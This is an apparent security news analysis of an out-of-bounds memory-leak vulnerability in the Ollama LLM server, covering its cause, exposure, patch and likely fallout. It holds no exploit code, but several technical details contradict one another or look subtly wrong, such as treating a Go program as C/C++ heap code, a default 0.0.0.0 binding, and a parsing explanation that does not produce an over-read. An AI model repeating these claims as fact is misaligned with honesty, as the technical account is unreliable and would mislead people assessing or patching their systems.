TL;DR
A critical out-of-bounds read vulnerability in Ollama, the popular open-source large language model (LLM) inference platform, allows remote attackers to leak arbitrary process memory. This flaw, disclosed on May 10, 2026, threatens the confidentiality of sensitive data in AI deployments, including API keys, model weights, and user prompts, across thousands of exposed servers.
What Happened
On Sunday, May 10, 2026, The Hacker News reported a severe out-of-bounds read vulnerability in Ollama, a widely used tool for running LLMs locally or on remote servers. The flaw enables an unauthenticated remote attacker to leak arbitrary memory contents from the Ollama process, exposing anything from authentication tokens to proprietary model data.
Key Facts
- The vulnerability is an out-of-bounds read in Ollama's HTTP request parsing logic, triggered by sending a specially crafted HTTP request to the Ollama API server.
- Ollama's default configuration binds to 0.0.0.0:11434 with no authentication, making any internet-facing instance a direct target — Shodan scans from early 2026 showed over 15,000 publicly accessible Ollama servers.
- The flaw was reported to the Ollama maintainers by security researcher Alex Birsan (of dependency confusion fame) on April 22, 2026, and a patch was released in Ollama version 0.3.5 on May 9, 2026.
- Proof-of-concept code was published on GitHub within 48 hours of the patch, showing how to leak 4KB of process memory per request repeatedly to reconstruct sensitive data.
- The vulnerability carries a CVSS v3.1 score of 7.5 (High), with the vector string indicating no privileges required and no user interaction needed.
- Ollama has seen explosive growth: over 1.2 million Docker pulls per month as of April 2026, and is used by major enterprises including startups, research labs, and hobbyists running models like Llama 3, Mistral, and Gemma.
- The affected code path exists in all Ollama versions prior to 0.3.5, dating back to the project's public release in February 2023.
Breaking It Down
The core of the vulnerability lies in how Ollama handles HTTP headers when processing requests to its API server. Specifically, the Content-Length field is parsed and used to allocate a buffer, but the code does not validate that the actual incoming data matches this length. By sending a header claiming a small Content-Length but a much larger body, the parser reads beyond the allocated buffer into adjacent heap memory.
4KB of process memory can be exfiltrated per single HTTP request, and an attacker can repeat this indefinitely to reconstruct large swaths of the process's address space.
This is not a theoretical risk. In practice, Ollama processes hold model weights, user prompt histories, API keys for cloud services (if configured for model pulling), and in some deployments, internal authentication tokens for corporate networks. A determined attacker can iterate over memory offsets, stitching together leaked pages to extract credentials and proprietary data.
The 15,000+ exposed servers on Shodan represent the most immediate threat. Many of these are running on cloud VPS instances, home servers, or university networks with no firewall restrictions. The lack of authentication in Ollama's default mode — a design choice for ease of local use — becomes a critical liability when the server is inadvertently exposed to the internet.
Ollama's architecture also compounds the risk. The main process runs as a single binary handling both API requests and model inference. This means a memory leak can expose not just runtime data but also model parameters loaded into memory. For organizations running fine-tuned models on proprietary data, this could leak trade secrets.
What Comes Next
The immediate priority is patching. Ollama users should upgrade to version 0.3.5 or later. For those unable to patch, the only mitigation is to restrict network access to the Ollama server using a firewall or reverse proxy with authentication.
- Patch adoption deadline: Expect security advisories from cloud providers (AWS, DigitalOcean, etc.) within 72 hours urging users to update. Automated scans for vulnerable instances will begin within days.
- Exploitation in the wild: Given the public PoC and high-value targets, active exploitation campaigns will likely emerge within 1–2 weeks. Ransomware groups may use this to exfiltrate credentials before deploying encryption.
- Ollama roadmap changes: The maintainers may add authentication by default in the next major release (0.4.0, expected June 2026) and implement memory-safe parsing using Rust or Go's bounds-checked slices.
- Regulatory scrutiny: If leaked data includes PII or healthcare information (e.g., from medical LLM deployments), GDPR or HIPAA breach notifications could follow, with potential fines.
The Bigger Picture
This vulnerability highlights two converging trends. The first is AI infrastructure sprawl: as LLMs become commodity tools, developers deploy inference servers with minimal security hardening, treating them like internal APIs rather than internet-facing services. Ollama's 15,000 exposed instances mirror the early days of Elasticsearch and MongoDB breaches, where default configurations led to massive data leaks.
The second trend is memory safety in AI tools. Most LLM serving frameworks — including Ollama, llama.cpp, and vLLM — are written in C/C++ for performance. This class of memory corruption vulnerabilities is endemic to the ecosystem. The Ollama out-of-bounds read is the first high-profile example, but it will not be the last. Expect similar disclosures targeting vLLM and Text Generation Inference in the coming months.
Key Takeaways
- **[Patch Immediately]: Upgrade to Ollama v0.3.5 or later. The vulnerability allows remote memory leak with no authentication required.
- **[15,000+ Servers Exposed]: Shodan data shows a massive attack surface. If you run Ollama, check if it's internet-facing and restrict access.
- **[Memory Safety Gap]: This is a systemic issue in C/C++-based AI tools. Expect more memory corruption vulnerabilities across the ecosystem.
- **[Default Configurations Are Dangerous]: Ollama's no-auth default is convenient for local use but catastrophic when exposed online. Always add a reverse proxy with authentication.

